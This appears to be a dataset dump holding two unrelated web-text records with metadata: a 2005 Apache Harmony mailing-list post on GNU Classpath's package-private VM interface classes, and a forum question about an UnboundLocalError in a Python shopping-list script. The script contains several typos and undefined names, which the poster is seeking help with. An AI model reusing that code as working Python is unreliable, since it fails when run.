text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Geir Magnusson Jr. wrote: > 2) Core classes implemented by the VM for class-library usage > - standard - things that you expect in java.lang (java.lang.Object) > - non-standard - extension to java.lang (java.lang.VMObject) > 3) I was uncomfortable with extending java.lang. I understand the > argument - that as they are package private, the language can be > depended upon to keep them safe from user code using them rather than > some security infrastructure. However, isn't this a bit dangerous in > terms of standard java.lang changes colliding? In general a VMInterface class resides as a package private class in the package that the class they help implement resides in. Using package private, not-user-visible classes seems to be pefectly valid way to do get similar things done in other, officially certified as compatible implementations[1], so I don't think that having package private classes means someone is extending the package's namespace, given that the VMInterface classes are not exported to user code to compile against. Therefore I think the term 'extension' is misplaced in this context. The VMInterface classes are an internal (and very useful in practice) detail of this particular class library implementation that does not extend the namespace available to user code to link against. Extending the name spaces would not be clever for all the obvious binary compatibility reasons, after all. The JCP may eventually specify classes in the future with the same names. That could happen, and would be just fine. The JCP is obviously free to call the specified classes any way they want, and if for some reason the JCP decides to call some future 1.6 Object class VMObject, so be it. :) The internal GNU Classpath VM interface for Object would have to change at that point, and things would move on just as they do all the time someone changes the VM interface for a different reason. It currently changes rather frequently in some areas, as people figure out new ways how to implement the respective classes in a better fashion. cheers, dalibor topic [1] see java.io.UnixFileSystem class in the stack trace.
http://mail-archives.apache.org/mod_mbox/harmony-dev/200505.mbox/%3C42975B78.2080705@kaffe.org%3E
CC-MAIN-2014-23
refinedweb
356
54.32
Multiple Ship-To Addresses Discussion in 'ASP .Net Web Controls' started by Tina Smith, May 19, 2005. - Similar Threads OT - domain registrar-shipAxel Foley, Jun 24, 2004, in forum: HTML - Replies: - 7 - Views: - 556 - Tina - AffordableHOST, Inc. - Jun 24, 2004 SWIG/IDLE/Python: F5 SHIP.py works but "import SHIP" gives "ImportError: dynamic module does not defBill Davy, May 12, 2005, in forum: Python - Replies: - 0 - Views: - 908 - Bill Davy - May 12, 2005 Physical Addresses VS. Logical Addressesnamespace1, Nov 29, 2006, in forum: C++ - Replies: - 3 - Views: - 1,102 Can I use setup.py to ship and install only .pyc files?Mike Kent, Apr 16, 2009, in forum: Python - Replies: - 0 - Views: - 740 - Mike Kent - Apr 16, 2009 Space Ship Operator <=> Odd BehaviourNathanial Allan, Sep 28, 2010, in forum: Ruby - Replies: - 3 - Views: - 185 - Robert Klemme - Sep 30, 2010 MS SQL geek wants to jump ship, plz help on first Perl script, May 4, 2006, in forum: Perl Misc - Replies: - 14 - Views: - 323 - Peter J. Holzer - May 8, 2006 I need to be amused on the perldocs that ship with Perl.grocery_stocker, Nov 4, 2006, in forum: Perl Misc - Replies: - 5 - Views: - 160 - Ted Zlatanov - Nov 6, 2006 " Mentor-ship applied for November 8th 2006 "U S Contractors Offering Service A Non-profit, Nov 8, 2006, in forum: Javascript - Replies: - 1 - Views: - 267 - Ivan Marsh - Nov 8, 2006
http://www.thecodingforums.com/threads/multiple-ship-to-addresses.776115/
CC-MAIN-2016-40
refinedweb
228
66.37
Talk:Semi-colon value separator Discuss Semi-colon value separator here: Contents - 1 find my nearest cafe - 2 why not multiple tags instead - 3 multiple values for tags that are somehow connected to each other - 4 Warning in Potlatch2 - 5 Escaping - 6 Page focus changed from semi-neutral to the clear message Avoid semi-colon value separator - 7 Jgpacker disruptive opinion based edits without arguments or talk at this page / tagging@ list - 8 Avoid semi-colons? - 9 Most of our data/mappers follow approach pick one value find my nearest cafe Why the "find my nearest cafe" can not find something marked as amenity=cafe;bar. If it is the case that *semi-color is NOT a value separator*, because it does not separate values to individual ones. --Jakubt 11:23, 2 July 2011 (BST) What is the (technical) reason for not using tag with the same key several times. Imagine using amenity=cafe amenity=bar insted of amenity=cafe;bar it seems to solve the inability of semicolon to act as separator in searches and also simplifies the usage greatly for non geeks. -- User:Jakubt 10:23, 2 July 2011 - +1 - why would such simple straightforward approach be unfeasible? --solitone 21:17, 20 November 2012 (UTC) - Well it's not unfeasible apart from that would be a low level change to the OpenStreetMap data representation, database and API, which would mean all data consumers and editors needing code changes to work with it. Changes like this can be made, but only rolled out as a new numbered version of the OSM API e.g. "API 0.7" (not likely to happen any time soon) - Should such a change be considered for "API 0.7"? Maybe. It solves this particular niggling data problem, but it has a consequences for people trying to understand OpenStreetMap (how to use the data, or how to add tags in an editor) It introduces a new thing mappers can do wrong in the editor (accidentally at the same key twice) and new set of tag formulations for data consumers to contend with (though probably easier than contending with stuffed in ';' chars) - I wouldn't really describe this as a simple straightforward change. - -- Harry Wood 23:58, 20 November 2012 (UTC) - how about numbring the tags and add a 'tag:multi' tag with a value of how many values for this tag should be considerd: - (E.g. amenity:multi=2 , amenity1=cafe, amenity2=bar). This way the rendrer has a chance to render multiple tags next to each other. Espcially useful for merged highways with multiple 'ref' values. - And no API change necessary. - --Mixmaxtw (talk) 06:37, 12 April 2013 (UTC) - Yeah so obviously you're now just suggesting another tagging scheme (fitting within the way the API/data format currently works) . Did you mean to start a new heading for that idea? In the discussion below they're also suggesting bunging in numbers. -- Harry Wood (talk) 05:06, 13 April 2013 (UTC) This does not fix the problem of having multiple values for tags that are somehow connected to each other. Imagine you want to tag the opening hours of a bank where the ATM has different opening hours than the bank itself. Or a road where different speed limits apply at different hours or for different vehicles. I would more like to see a way to connect such tags, such as numbered namespaces, for example tagging the bank with amenity:0=bank, opening_hours:0=Mo-Fr 08-17:00, amenity:1=atm, opening_hours:1=Mo-Su 06:00-22:00. --Candid Dauth 00:41, 21 March 2009 (UTC) - You gave me an idea for the multiple tags problem: use subscripts. For example, amenity[0]=bank, amenity[1]=atm, amenity[2]=... No subscript on a tag implies tag[0]. It's not as elegant as the multiple tags as proposed above, but the idea might be useful somewhere.--Elyk 02:46, 21 March 2009 (UTC) - This could solve currently unmappable limits that only apply to specified vehicles as well. For example, near my home there is a road that limits the weight to 3.5 tonnes, except for agricultural vehicles. With some “for” or similar tag, we could limit a limit to specified vehicles, in this example maxweight[0]=3.5; maxweight[1]=-1; for[1]=agricultural (presuming -1 means “no limit”). Another example, on the Autobahn 8, there is a segment where between 6 and 20 o’clock, maxspeed is limited to 100 km/h, and 60 km/h for HGVs. Currently, this is unmappable, but with “tag arrays” this would be easy: maxspeed[0]=100; hour_on[0]=6; hour_off[0]=20; maxspeed[1]=60; for[1]=hgv; hour_on[1]=6; hour_off[1]=20. As a consequence, we wouldn’t have hundreds of different tag keys for the access of different vehicles but only the “access” and the “for” tag, for a cyclepath for example: access[0]=no; for[0]=all; access[1]=yes; for[1]=foot; access[2]=designated; for[2]=bicycle. --Candid Dauth 02:03, 24 March 2009 (UTC) - Not quite. What if there are some unrelated arrays on the same way? For example suppose the road has name[0]=foo; name[1]=bar. Does this mean that road 'foo' has maxspeed=100, while road 'bar' has maxspeed=60? This doesn't make sense to a human, but a parser might get confused. Of course you could use different indices (e.g. name[2]=foo; name[3]=bar) but that gets ugly and abuses the whole array idea.--Elyk 05:14, 24 March 2009 (UTC) - One problem is that all of the tags don't form any kind of hierarchy. node |-- amenity=bank |-- opening_hours=Mo-Fr 08-17:00 |-- amenity=atm \-- opening_hours=Mo-Su 06:00-22:00 - Logically this should form a tree: node |-- amenity=bank | \-- opening_hours=Mo-Fr 08-17:00 \-- amenity=atm \-- opening_hours=Mo-Su 06:00-22:00 (common part of node tags) name=Bank of ... (first subitem) 1:amenity=bank 1:opening_hours=Mo-Fr 08-17:00 (second subitem) 2:amenity=atm 2:opening_hours=Mo-Su 06:00-22:00 - and name=... (default name) maxweight=3.5 (default maxweight) 1:type=agricultural 1:maxweight=5 (override default maxweight for 1:type=agricultural) 2:type=non-agricultural 2:maxweight=no (override default maxweight for 1:type=non-agricultural) - Another problem is that some tag combinations don't easily form a tree. In the maxweight example above, which tag do you choose as the root? node |-- maxweight=3.5 \-- maxweight=-1 \-- for=agricultural - or node |-- maxweight=3.5 \-- for=agricultural \-- maxweight=-1 - You could argue either way. Maybe the maxweight=3.5 could be a child of another for=non-agricultural tag?--Elyk 05:49, 24 March 2009 (UTC) - Your problem above with the two names of the road could perhaps be solved by double tagging: - name[0]=foo - maxspeed[0]=100 - for[0]=motor_vehicle - name[1]=foo - maxspeed[1]=60 - for[1]=hgv - name[2]=bar - maxspeed[2]=100 - for[2]=motor_vehicle - name[3]=bar - maxspeed[3]=60 - for[3]=hgv - This looks a bit confusing, but I think it would actually be a solution without tag hierarchy. (And I don’t think that such cases occur very often in reality.) We could also shorten this: - name[0,1]=foo - name[2,3]=bar - maxspeed[0,2]=100 - maxspeed[1,3]=60 - for[0,2]=motor_vehicle - for[1,3]=hgv - (Which keeps the logic, but is even more confusing ;-)) --Candid Dauth 17:05, 24 March 2009 (UTC) - Doesn't that already make relations a much more appealing solution for such complex cases? Alv 17:18, 24 March 2009 (UTC) - How? By defining that members of a relation inherit its tags? --Candid Dauth 22:07, 26 March 2009 (UTC) - If you represent the ATM as a separate node ((amenity=atm node separate from amenity=bank) then all of these awkward schemes for making one tag relate to another value are not necessary (We're not designing a programming language here! keep it simple!) It creates its own problems of course, because now the ATM is not as clearly related to the bank, so I guess Alv is suggesting using a relation for that. Personally I just map them separately anyway (without a relation). If some automated process really needs to know that the ATM is related to the bank, it could use nearby location heuristics, ...or we could stick relations on them. In any case, I would suggest that mapping them as separate elements is the solution for this particular ATM<->bank example. Are there any other examples where properties tags need to associate themselves with different values with in another multi-value tag? It seems to me that to worry about that kind of thing, is to try and be too flexibly generic at the expense of mapping simplicity. -- Harry Wood 14:37, 5 December 2010 (UTC) Warning in Potlatch2 Potlatch2 displays a warning "The tag contains more than one value - please check". It was about a path that is ski piste in winter and a mountain bike route in summer, tagged as "route:mtb;ski" So what to do? --User:Gerdami 13:49, 29 January 2012 (UTC) - I second on that question. Have the same warning with multiple animals living in the same cage in the zoo (like "animal:donkey;lama") Positron96 13:14, 27 June 2012 (BST) - From what I understand, it's just a warning, not an error. So you should be able to use those multiple values. However, as I read on this wiki page, this practice is discouraged, and so Potlatch warns you. Following the reasoning in this wiki, you had better choose either mtb or ski, depending on the main usage your route has. --solitone 21:13, 20 November 2012 (UTC) - Yeah it's just a warning, but it's important to realise that little/no software dealing with mountain bike and ski routes will actually know how to decode your mashed together tag. Yes it's algorithmically possible, but you're making developers work very hard. Instead perhaps you should follow a 'split the element' approach. Map the ski route and the mountain bike route as two different ways. They could overlap eachother sharing nodes (which has it's own problems) or in fact it wouldn't be all that unreasonable to have them following close to eachother but not exactly the same way. I'm not an expert, but I think generally a mountain bike follows a more specific eroded zig zagging pathway down the mountain, while a ski piste is probably easier just mapped as a centreline. Anyway, two different ways, problem solved. - -- Harry Wood 23:47, 20 November 2012 (UTC) - I face this very same issue, as bikers ride the hiking trails (route=hiking) in my area. I thought I might use route=hiking;mtb, but then I read Semi-colon value separator#When_NOT_to_use_a_semi-colon_value_separator, and changed my mind. Plus, it's true very few applications do manage such tagging scheme--for instance, Waymarked Trails: Hiking map does not. This explains why multiple values for route=* are almost unused at the moment [1]. - Since both hikers and bikers follow the same trail, I wouldn't use two different ways to map one single trail, though. I feel a better practice would rather be using two relations--the first with route=hiking, and the second with route=mtb. The second relation could be created as a copy of the first (very practical from a mapping perspective), hence the two relations would share the same members, and the only difference between them would be in route=*. It's true you would end up with a duplicate relation, nevertheless you would still have one single way, which corresponds to reality, as you only have one physical trail. - Any thoughts? - --solitone 13:58, 21 November 2012 (UTC) - Yes there's no restriction on the number of relations you can attach to a particular element, even several of the same type (type=route). I'm usually quite anti relations, because they get over-used in many silly ways. Using relations is not the solution for all of these tagging problems (contrary to what some mappers seem to think!) For example it would be rather a messy mis-use to attach multiple relations onto animal cages. But in the case of overlapping hiking/biking routes, it's sensible yes. It's already quite common to use relations for routes, and this is an established reasonably elegant way of dealing with awkward overlaps. -- Harry Wood 15:18, 21 November 2012 (UTC) - As for animals in a cage, maybe this is an example where semi-colon value separators make more sense, a bit like the car service types. You're capturing lots of extra hyper-detail which is (perhaps) less likely to be consumed in a way which would require distinct parsing and machine processing of the different animals. But yes, potlatch will warn you. - -- Harry Wood 23:47, 20 November 2012 (UTC) Escaping The page suggests doubling of literal semicolons to escape them. That won't work, because - foo;;bar may either mean foo;bar or foo + (empty value) + bar - foo;;;bar may either mean foo; + bar or foo + ;bar or foo + (empty value) + (empty value) + bar While empty values are certainly always useless, a leading or trailing semicolon may be desired sometimes, e.g. when an inscription on a stone ends with a ";" because the rest ot the text fell victim to weathering. The usual way to escape special charaters is to use a dedicated escape character: \; → ; \\ → \ --Fkv (talk) 19:13, 23 January 2015 (UTC) - If empty values are ever allowed then it doesn't work. Now at this point I would be tempted to say that you that you are disappearing up your own arse overthinking a problem that basically doesn't exist... except - I do like the point you're making here, because actually means the overthinking that other people have done... hasn't been thought through properly :-) Now that I think about it, if you come across a ';;' in the data, you're probably far more likely to be seeing a case where a user has entered an empty value into some buggy mobile app, rather than this escaping meaning. - I've added a note that empty values should not be permitted. To me that seems like common sense, and actually that's a more useful rule to be stating. - -- Harry Wood (talk) 13:49, 26 January 2015 (UTC) - By the way, in my original incarnation of this page, the "When NOT to use" section was higher up the page, and all this escaping nonsense was placed further down as a sort of quirky footnote at the bottom. In my opinion that was a clearer way to arrange things -- Harry Wood (talk) 13:52, 26 January 2015 (UTC) - Leaving empty values aside, there's still the other problem that ;;; may mean literal ";" + separator or separator + literal ";". This can be coded, but not decoded. --Fkv (talk) 20:04, 26 January 2015 (UTC) - Added this note to the page. Probably we should just state instead "it is impossible to decode multiple values using strings without escape character and null character and not to mess with ;; suggestion. How many software developers fallen into this trap? Xxzme (talk) 04:48, 27 January 2015 (UTC) - No null character needed. I think that the backslash \ is a sufficient escape character, because it never occurs in normal text. --Fkv (talk) 06:37, 27 January 2015 (UTC) - \ is a sufficient escape character, because it never occurs in normal text What. Do you have basic knowledge of encoding theory? - You are definitely have no idea how taginfo works. searchbox for \ in value part in top-right corner [2]. Otherwise you wouldn't make such claims. - Regarding my earlier point. "When NOT to use" section is now higher up the page, and this escaping nonsense is lower down in an "syntax" section -- Harry Wood (talk) 01:32, 31 May 2015 (UTC) Page focus changed from semi-neutral to the clear message Avoid semi-colon value separator This change was recently discussed at tagging list, there no better solution at the moment for regular mappers. Details are at page and tagging@ list. Xxzme (talk) 04:10, 27 January 2015 (UTC) - This may be your perception, but as a matter of fact the majority of participants in the mailing list disagree with you and your page edits. Regular mappers really do not need to care about parsing. They only need to find the ";" key on their keyboards. --Fkv (talk) 06:31, 27 January 2015 (UTC) - I don't care about people at tagging list. I do care about regular mappers. - I don't care about keyboards. User interfaces are not limited only to keyboard input. - There dozens of tagging schemes and thousands of mappers who use these tags to prove you are wrong - 8735 distict people were use tag fuel:diesel=*. You can throw your tagging list in the garbage can. - I have no idea what do you trying to achieve here. Do you have better solution to the problem? Can you improve database schema and relevant API code? Xxzme (talk) 06:45, 27 January 2015 (UTC) - When you want to use taginfo, you simply go to the key page (such as ) and you type the value in the search field inside the box. You will have as a result everything a regular mapper needs. - I don't buy your argument about the other tags --> "People did this decision in the past in cases X and Y, so we have to follow it for everything, whether that's the best decision for other cases or not" ? - --Jgpacker (talk) 10:58, 27 January 2015 (UTC) - You don't buy what? Is this how you make arguments? Wow. - So what. I'm not your teacher. If you choose to be ignorant than be it. Don't fool other people like it is good idea to use semicolon. - 10 points why it is wrong to use semicolon or multiple values in value part of tags - 3 alternatives to users how to avoid them - If you want to use semicolon them you should prove every statement at this page is wrong, not me. 11:10, 27 January 2015 (UTC) - here is how you should make statements. Your link to cuisine only proves my words: search for ; in taginfo. - There only 2212 cuisine values with ;. Top multivalued tag in cuisine is only with 642 instances. - You only prove my words: Most cuisine tags are single-valued or tagged using single node per tag appoach. - 9679 values in total, this means you approach is also less popular across all mappers around the world. This is not your single opinion how things looks like. These are numbers. - top cruisine values are without semicolon, you don't need complex tools to examine most popular values and sum numbers. Numbers will be always against you. Always. It only proves my statement that most of OSM data is single valued, not multivalued. - There no need for semicolon/multiplevalues when you have 3 different approaches to avoid them entirely. Xxzme (talk) 12:15, 27 January 2015 (UTC) Jgpacker disruptive opinion based edits without arguments or talk at this page / tagging@ list - [7][8] [9] [10] [11] [12] [13] [14] - I have no idea what this person trying to archive or fool someone. There plenty of link present to prove statements at this page. If there something missing, then missing parts should be added, not every single change should be reverted. Xxzme (talk) 10:36, 27 January 2015 (UTC) - The discussion in the tagging list is still ongoing. You must not make such edits before reaching consensus. I was simply reverting them. The majority of people in the mailing list do not agree with your views. --Jgpacker (talk) 10:47, 27 January 2015 (UTC) - Please settle the discussion before making extensive documentation changes, or else I'll ban both of you. --Dee Earley (talk) 10:50, 27 January 2015 (UTC) - Hi, my changes were simply the reversion of documentation change; exactly because the discussion is still ongoing (mostly in the tagging mailing list). --Jgpacker (talk) 11:00, 27 January 2015 (UTC) - Then you will ban wrong person. Discussion at tagging list was 115 messages long. No activity since my last message to the list. My last message should look like this. It was posted at 2015-01-25, I haven't seen reply to it for 2 days so I decided to make actual updates to wiki. Jgpacker doesn't like changes and wants to revert these edits without arguments. He did same thing at tagging list, now he wants to repeat this trick here. Not going to happen. Xxzme (talk) 11:02, 27 January 2015 (UTC) - You're both edit waring. I don't care who's "in the right" at the moment. I can revert back to the state this morning until there is some form of consensus on the change. --Dee Earley (talk) 11:08, 27 January 2015 (UTC) - Quote: "Then you will ban wrong person.". My opinion: I don't think so. - Quote: "No activity since my last message to the list.". Maybe that's because you are simply ignored? This has - I'm just guessing - maybe something to do with lines like "Are you and idiot?" in many of your mails. - I support a revert to the state this morning and I most definitively support a ban of Xxzme. --Imagic (talk) 11:30, 27 January 2015 (UTC) - About the second quote: I suppose he was banned from the mailing list before sending his last message (for insulting an user even after receiving an warning). --Jgpacker (talk) 11:35, 27 January 2015 (UTC) - Pages have been reverted to Decemberish, and the semicolon page has been renamed back and protected for a week. Please sort yourselves out and introduce gradual changes if deemed necessary rather than wide sweeping changes to how the entire data set should be handled. Have a nice day. --Dee Earley (talk) 11:49, 27 January 2015 (UTC) Sorry my original words seem to have caused a heated debate. I would be interested in any consensus emerging on the mailing list, but really it requires calmer discussion. On the wiki here too. This discussion is confrontational. The nice thing about wiki discussions, is that we can purge them onto an archive page. I suggest we do that with this discussion, so that we can take a breather, and then continue more calmly with "Avoid semi-colons?" below. -- Harry Wood (talk) 17:11, 27 January 2015 (UTC) Avoid semi-colons? I wrote the original page here. There's some wording on there which is fairly strong "In general avoid ';' separated values whenever possible" but that's not an absolute "DO NOT USE". The page goes on to give an example of how to avoid them in some cases where a lot of mappers may be tempted to use them (the amenity=cafe;bar and amenity=library;cafe examples). But there are cases where they can be useful, and not too damaging to the simplicity of the data. So this is tricky. I wanted to use clear strong words to try avoid mappers going overboard with using these characters. But the page is not intended as a ban on all semi-colons. To rename this whole page as "Avoid using semi colons" is not appropriate. Hopefully we can agree on this. I think it was just a misunderstanding. -- Harry Wood (talk) 17:11, 27 January 2015 (UTC) - Well better solution will be in two separate pages. Neutral page in general avoid separated values whenever possible. But I also need to point users to alternative schemes and disadvantages(later section may need some rework or more links) under no circumstances I will agree if this content will be not accessible simply because there no consensus about this. How does this even possible in OSM. Is there good idea how to split older version of the page into two pages? Xxzme (talk) 17:27, 27 January 2015 (UTC) - The wiki page should reflect consensus. That can be a difficult thing to achieve. You don't have to agree with the consensus, but you should make an effort to reflect it when you're making wiki edits. There's no single author in charge of the text. If you're suggesting that you could go off onto another wiki page where you can be the single author. Well I'm afraid that won't work. ALL wiki pages should reflect consensus. The only exception to that is if you make a subpage from your user page and label it clearly as an essay/opinion piece (we used to have a Template:Essay for this. Not sure why it was deleted) - In the main namespace I don't think this is a big enough topic to spread onto multiple pages. We should document semi-colon value separators on this page... and yes... we should reflect consensus. This is actually a powerful thing about wikis. Some people love semi-colon values, some people hate them, and together they're forced to agree upon what the text of this wiki page should say. It's not always like that. Across a lot of pages of the wiki we can be quite bold and make some sweeping changes as long as they feel like improvements, but on pages like this we know that there is a weight of opinion on either side of a debate. It's not acceptable to do things like renaming the whole page to push one point of view. - -- Harry Wood (talk) 13:05, 29 January 2015 (UTC) - Concerning "You don't have to agree with the consensus": If someone disagrees, it's not a consensus by definition. With more than 500000 users, you will never reach a consensus. Therefore, the wiki cannot reflect a consensus. It should reflect usage and points of views supported by a notable portion of the community. I agree that single user opionions as presented by Xxzme belong to the respective user page or a subpage thereof. Discussion pages and proposals are also fine, of course. --Fkv (talk) 13:44, 29 January 2015 (UTC) - "If someone disagrees, it's not a consensus by definition" . No I think you're thinking of "unanimous agreement". Yeah the contents of the wiki are not governed by unanimous agreement :-) -- Harry Wood (talk) 14:58, 29 January 2015 (UTC) - Please don't start fighting over the correct term now! PLEASE!! ;-) --Imagic (talk) 15:42, 29 January 2015 (UTC) - Hehe. Yeah no I thought it was fairly clear what "consensus" means, but this did give me pause for thought. Maybe to be clear, I should say a longer thing... the wiki contents are governed by Consensus decision-making. And "views supported by a notable portion of the community" is maybe just another way of saying that. ...I think we know what we mean -- Harry Wood (talk) 15:54, 29 January 2015 (UTC) Most of our data/mappers follow approach pick one value 50M tags: - tenths of millions highway tags. Just for laughs: top value with semicolon is highway=residential;unclassified with 189. 10M tags: - name tag and other name tags use single value, without semicolon - most of source tags are also single-valued - same goes for addr:city tags - same for postcodes - surface natual landuse also follow pattern single key-single value - natual - only 70 values with ; top value with only 23 instances - landuse - only 115 value with ; top value with 1359 but second is only with 58 - surface - 848 values (vs 4037 in total) with ; with most popular with only 1222 instances. Now compare this to millions and hundreds of thousands asphalt, unpaved, paved, gravel, ground, dirt, grass, concrete, paving_stones, sand, cobblestone, compacted - access tags are single valued, more laughs: top multivalued access=agricultural;forestry with 217 instances 1M tags: - shop tags are mapped using single node per tag to avoid tag collisions If some person wants to use semicolon in value despite all challenges and forcing other mappers in trouble situations while avoiding all alternatives, thats only fault of the person who fails to see real reasons behind such destribution of tags and countless user preference (not to use multiple values in value part / mess with all relevant troubles). Xxzme (talk) 11:49, 27 January 2015 (UTC)
http://wiki.openstreetmap.org/wiki/Talk:Semi-colon_value_separator
CC-MAIN-2017-17
refinedweb
4,754
61.67
We've built this example using JDK 16, Gradle 7.1 and the Vonage Server SDK for Java v.6.4.0 The Vonage SMS API is a service that allows you to send and receive SMS messages anywhere in the world. Vonage provides REST APIs, but it's much easier to use the Java SDK we've written for you. In this tutorial, we'll cover how to send SMS messages with Java! View the source code on GitHub. Prerequisites Hopefully, you already have a basic understanding of Java programming - we're not going to be doing any highly complicated programming, but it'll help you get up and running. As well as a basic understanding of Java, you'll also need the following installed on your development machine: * Java Development Kit (JDK) * Gradle for building your<< Using the Vonage Java SDK First, you need to set up your Gradle project and download the Vonage Java SDK. Create a directory to contain your project. Inside this directory, run gradle init. If you haven't used Gradle before, don't worry - we're not going to do anything too complicated! Select 1: basic as the type of project to generate, 1: Groovy as build script DSL, and name your project—or press Enter for the default option. Next, open the build.gradle file and change the contents to the following: // We're creating a Java Application: plugins { id 'application' id 'java' } // Download dependencies from Maven Central: repositories { mavenCentral() } // Install the Vonage Java SDK dependencies { implementation 'com.vonage:client:6.4.0' } // We'll create this class to contain our code: application { mainClass = 'getstarted.SendSMS' } Now, if you open your console in the directory that contains this build.gradle file, you can run: gradle build This command will download the Vonage Java SDK and store it for later. If you had any source code, it would also compile that—but you haven't written any yet. Let's fix that! Because of the mainClass we set in the Gradle build file, you're going to need to create a class called SendSMS in the package getstarted. In production code, you'd want the package to be something like com.mycoolcompany.smstool, but this isn't production code, so Gradle uses the same directory structure as Maven, so you need to create the following directory structure inside your project directory: src/main/java/getstarted. On macOS and Linux, you can create this path by running: mkdir -p src/main/java/getstarted Inside the SendSMS.java. Open it in your favourite text editor, and we'll start with some boilerplate code: package getstarted; import com.vonage.client.VonageClient; import com.vonage.client.sms.MessageStatus; import com.vonage.client.sms.SmsSubmissionResponse; import com.vonage.client.sms.messages.TextMessage; public class SendSMS { public static void main(String[] args) throws Exception { // Our code will go here! } } All this does is import the necessary parts of the Vonage SDK and create a method to contain our code. It's worth running gradle run now, which should run your main method. It won't do anything yet, but this is where we get to the exciting bit. Send SMS Messages With Java Put the following in your main method: VonageClient client = VonageClient.builder() .apiKey(VONAGE_API_KEY) .apiSecret(VONAGE_API_SECRET) .build(); Fill in VONAGE_API_KEY and VONAGE_API_SECRET with the values you copied from the Vonage API Dashboard. This code creates a VonageClient object that can be used to send SMS messages. Now that you have a configured client object, you can send an SMS message:. " + response.getMessages()); } else { System.out.println("Message failed with error: " + response.getMessages().get(0).getErrorText()); } Again, you'll want to replace VONAGE_BRAND_NAME and TO_NUMBER with strings containing the virtual number you bought and your own mobile phone number. Make sure to provide the TO_NUMBER in E.164 format—for example, 447401234567. Once you've done that, save and run gradle run again. You should see something like this printed to the screen: Message sent successfully.[com.vonage.client.sms.SmsSubmissionResponseMessage@f0f0675[to=447401234567,id=13000001CA6CCC59,status=OK,remainingBalance=27.16903818,messagePrice=0.03330000,network=23420,errorText=<null>,clientRef=<null>]] ... and you should receive a text message! If it didn't work, check out if something was printed after ERR: in the line above, and maybe wait a few more seconds for the message to appear. Note: In some countries (US), VONAGE_BRAND_NAME has to be one of your Vonage virtual numbers. In other countries (UK), you're free to pick an alphanumeric string value—for example, your brand name like AcmeInc. Read about country-specific SMS features on the dev portal. You've just learned how to send an SMS message with Vonage! <!--- You can either stop here or, for bonus points, learn how to build a Web service around it!-->
https://developer.vonage.com/blog/17/05/03/send-sms-messages-with-java-dr
CC-MAIN-2022-40
refinedweb
803
56.96
Dropping rpc API compat layer¶ This proposal is to make more direct use of oslo.messaging APIs throughout Neutron instead of a compatibility layer based on an old API. Problem Description¶ Neutron has migrated from the rpc code in oslo-incubator to the oslo.messaging library. The oslo.messaging library has a different (but better) API. To ease the transition to oslo.messaging, Neutron has used some compatibility code to convert the older style API usage to oslo.messaging APIs. This proposal is to make more direct use of oslo.messaging APIs throughout Neutron. Moving toward more direct usage of oslo.messaging APIs will improve consistency with other projects, since all projects should be converging on the newer style APIs. Proposed Change¶ The following classes are items considered as a part of the compatibility layer. The direct use of each of these things will be removed and replaced with direct use of equivalent and underlying oslo.messaging APIs. - neutron.common.rpc. - RpcProxy RpcCallback RPCException RemoteError MessagingTimeout This looks like a small list, but it’s more invasive than it looks. It will be broken up into several iterative patches that are more easily reviewed and merged over time. Here are some examples of the most invasive conversions (RpcProxy and RpcCallback): from oslo import messaging from neutron.common import rpc as n_rpc Old style client interface using RpcProxy: class ClientAPI(n_rpc.RpcProxy): BASE_RPC_API_VERSION = '1.0' def __init__(self, topic): super(DhcpPluginApi, self).__init__( topic=topic, default_version=self.BASE_RPC_API_VERSION) def remote_method(self, context, arg1): return self.call(context, self.make_msg('remote_method', arg1=arg1)) def remote_method_2(self, context, arg1, arg2): return self.call(context, self.make_msg('remote_method_2', arg1=arg1, arg2=arg2), version='1.1') New style client interface: class ClientAPI(object): def __init__(self, topic): target = messaging.Target(topic=topic, version='1.0') self.client = n_rpc.get_client(target) def remote_method(self, context, arg1): cctxt = self.client.prepare() return cctxt.call(context, 'remote_method', arg1=arg1) def remote_method_2(self, context, arg1, arg2): cctxt = self.client.prepare(version='1.1') return cctxt.call(context, 'remote_method_2', arg1=arg1, arg2=arg2) Old style server interface: class ServerAPI(n_rpc.RpcCallback): RPC_API_VERSION = '1.1' def remote_method(self, context, arg1): return 'foo' def remote_method_2(self, context, arg1, arg2): return 'bar' New style server interface: class ServerAPI(object): target = messaging.Target(version='1.1') def remote_method(self, context, arg1): return 'foo' def remote_method_2(self, context, arg1, arg2): return 'bar' Performance Impact¶ Negligible. In theory, this is removing a compatibility layer so there should be less code, but the overall performance impact of removing the layer is negligible in the broader scope of things. Developer Impact¶ There are several impacts to developers. Developers used to the older rpc API (and the equivalent compatibility layers) will have to learn what’s different. Arguably, it’s conceptually quite similar so this shouldn’t have a large impact. The oslo.messaging library itself has documentation. Looking at all of the existing code once it has been converted will help quite a bit as well, since you can just follow the existing pattern. The other impact is patch conflicts. Since this work involves some minor refactoring across the tree, it may conflict with other code in progress. This will only occur in the case of features that modify rpc APIs. The changes will be done in a series of smaller changes, which will help with rebasing and fixing conflicts against smaller sets of updates at a time. Alternatives¶ The alternative is to leave the compatibility layer in place. The downsides of this are that Neutron’s use of oslo.messaging will diverge further and further from what the rest of OpenStack messaging usage looks like. It may also make it more difficult to take advantage of new features in oslo.messaging in the future. Implementation¶ Testing¶ The unit tests will be updated as required. New ones will be added in key places where unit test coverage may be missing. There are no functional changes here, so all of the existing unit and functional tests will be relied upon to help ensure that no regressions are introduced. References¶ Existing oslo.messaging documentation:
https://specs.openstack.org/openstack/neutron-specs/specs/kilo/drop-rpc-compat.html
CC-MAIN-2019-35
refinedweb
684
50.84
<< Chang Hyeon Lee2,008 Points I need some help with UnboundlocalError now I am doing shopping list three and I followed the lecture like this: import os # make a list to hold onto our items shopping_list = [] def clear_screen(): os.system("cls" if os.name == "nt" else "clear") def show_help(): clear_screen() # print out instructions on how to use the app print("What should we pick up at the store?") print(""" Enter 'DONE' to stop adding items. Enter 'HELP' for this help. Enter 'SHOW' to see your current list. """) def add_to_list(new_item): show_list() if len(shopping_list): position = input("Where should I add {}?\n" "Press ENTER to add to the end of the list|n" "> ".fomat(item)) else: postion = 0 try: position = abs(int(position)) except ValueError: position = None if position is not None: shopping_list.insert(position-1, item) else: shopping_list.append(new_item) shoe_list() # add new items to our list shopping_list.append(new_item) print("Added {}. List now has {} items.".format(new_item, len(shopping_list))) def show_list(): clear_screen() # print out the list print("Here's your list:") index = 1 for item in shopping_list: print("{}. {}".format(index, item)) inext += 1 print("-"*10) show_help() while True: # ask for new items new_item = input("> ") # be able to quit the app if new_item.upper() == 'DONE' or new_item.upper() == 'QUIT': break elif new_item.upper() == 'HELP': show_help() 